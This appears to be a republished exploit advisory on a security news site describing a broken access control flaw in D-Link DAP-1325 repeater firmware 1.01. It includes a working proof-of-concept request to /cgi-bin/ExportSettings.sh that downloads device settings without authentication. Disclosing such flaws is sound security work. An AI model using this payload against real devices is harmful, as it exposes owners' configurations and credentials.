Home Tools Exploits & CVE's D-Link DAP-1325 Insecure Direct Object Reference

D-Link DAP-1325 Insecure Direct Object Reference

July 6, 2023

236

D-Link DAP-1325 suffers from an insecure direct object reference vulnerability.

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1 
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit

D-Link DAP-1325 Insecure Direct Object Reference

Follow us on Instagram @thecyberpost

EDITOR PICKS

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Gambio Online Webshop 4.9.2.0 Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Chamilo 1.11.18 Command Injection

WordPress Hide My WP SQL Injection

Kmaleon 1.1.0.205 SQL Injection